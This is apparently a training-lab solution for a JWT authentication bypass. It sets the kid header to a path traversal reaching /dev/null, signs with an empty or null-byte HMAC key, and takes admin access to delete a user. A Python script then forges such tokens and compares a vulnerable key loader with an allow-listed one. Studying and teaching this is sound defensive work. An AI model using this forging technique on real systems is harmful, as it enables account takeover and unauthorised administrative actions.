Note
In this solution, we'll point the kid parameter to the standard file /dev/null, which always reads as empty. In practice, you can point the kid parameter to any file on the server whose contents you can predict, and then sign the token with those contents as the HMAC secret.
Generate a suitable signing key
- In Burp, load the JWT Editor extension from the BApp store.
- In the lab, log in to your own account and send the post-login GET /my-account request to Burp Repeater.
- In Burp Repeater, change the path to /admin and send the request. Observe that the admin panel is only accessible when logged in as the administrator user.
- Go to the JWT Editor Keys tab in Burp's main tab bar.
- Click New Symmetric Key.
- In the dialog, click Generate to generate a new key in JWK format. Note that you don't need to select a key size as this will automatically be updated later.
- Replace the generated value for the k property with a Base64-encoded null byte (AA==). This is just a workaround because the JWT Editor extension won't allow you to sign tokens using an empty string. It produces the same signature as an empty key because HMAC zero-pads any key shorter than the hash block size, so a single 0x00 byte and an empty byte string both pad to the same 64 zero bytes for HS256.
- Click OK to save the key.
Modify and sign the JWT
- Go back to the GET /admin request in Burp Repeater and switch to the extension-generated JSON Web Token message editor tab.
- In the header of the JWT, change the value of the kid parameter to a path traversal sequence pointing to the /dev/null file: ../../../../../../../dev/null
- In the JWT payload, change the value of the sub claim to administrator.
- At the bottom of the tab, click Sign, then select the symmetric key that you generated in the previous section.
- Make sure that the Don't modify header option is selected, then click OK. The modified token is now signed using a null byte as the secret key.
- Send the request and observe that you have successfully accessed the admin panel.
- In the response, find the URL for deleting carlos (/admin/delete?username=carlos). Send the request to this endpoint to solve the lab.
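The two procedures above (generating a null-byte key, then re-signing the token with a traversing kid) as an added, stand-alone example that is not part of the original lab solution or of Burp's JWT Editor. It forges the token with the standard library only, shows why an empty key and a single null byte give the same HS256 signature, and contrasts a kid lookup that joins the header value straight onto a key directory (the behaviour the lab exploits, simulated here) with one that allow-lists known key IDs. The server secret, key directory, issuer and the wiener session token are all constructed for the example; the lab's real values are not known.

```python
import base64
import hashlib
import hmac
import json
import os
import tempfile
from typing import Callable, Optional

TRAVERSAL_KID = "../../../../../../../dev/null"  # same kid value used in the lab solution


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Build a compact JWS: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


# Constructed stand-in for the lab's server: one real key, file-backed, id "k1" (assumption).
SERVER_KEY = b"constructed-server-secret"
SAMPLE_TOKEN = sign_hs256({"kid": "k1", "alg": "HS256"},
                          {"iss": "portswigger", "sub": "wiener", "exp": 2000000000},
                          SERVER_KEY)


def forge_admin_token(session_token: str, kid: str = TRAVERSAL_KID, key: bytes = b"") -> str:
    """Retarget kid and sub on a captured token and re-sign it with the attacker-chosen key.
    key=b"" is what /dev/null yields; key=b"\\x00" is the JWT Editor AA== workaround."""
    h, p, _ = session_token.split(".")
    header = json.loads(b64url_decode(h))
    payload = json.loads(b64url_decode(p))
    header["kid"] = kid
    payload["sub"] = "administrator"
    return sign_hs256(header, payload, key)


def verify_hs256(token: str, key_loader: Callable[[str], bytes]) -> Optional[dict]:
    """Verify HS256 using whatever key the loader returns for the header's kid."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        if header.get("alg") != "HS256":
            return None
        key = key_loader(str(header.get("kid", "")))
    except (ValueError, KeyError, OSError):
        return None
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


def load_key_unsafely(keys_dir: str, kid: str) -> bytes:
    # VULNERABLE (simulates the lab): kid is joined onto the key directory with no
    # normalisation or allow-list, so "../../.." walks out to any readable file.
    with open(os.path.join(keys_dir, kid), "rb") as f:
        return f.read()


def load_key_safely(kid: str) -> bytes:
    # HARDENED: kid is only ever a lookup into a fixed set of known key IDs.
    known = {"k1": SERVER_KEY}
    if kid not in known:
        raise KeyError("unknown kid")
    return known[kid]


def demo_on_disk() -> Optional[dict]:
    """Real file read: traverse from a temp key directory to /dev/null (POSIX only)."""
    keys_dir = tempfile.mkdtemp()
    with open(os.path.join(keys_dir, "k1"), "wb") as f:
        f.write(SERVER_KEY)
    forged = forge_admin_token(SAMPLE_TOKEN)
    return verify_hs256(forged, lambda kid: load_key_unsafely(keys_dir, kid))


if __name__ == "__main__":
    print("forged:", forge_admin_token(SAMPLE_TOKEN))
    print("null-byte key == empty key:",
          forge_admin_token(SAMPLE_TOKEN, key=b"\x00") == forge_admin_token(SAMPLE_TOKEN))
    print("vulnerable loader accepts:", demo_on_disk())
    print("allow-list loader accepts:", verify_hs256(forge_admin_token(SAMPLE_TOKEN), load_key_safely))
```

The check worth keeping from this: the forged token and the AA==-signed token are byte-for-byte identical, so the JWT Editor workaround is not an approximation. The fix on the server side is not to sanitise the kid string but to never treat it as a path at all.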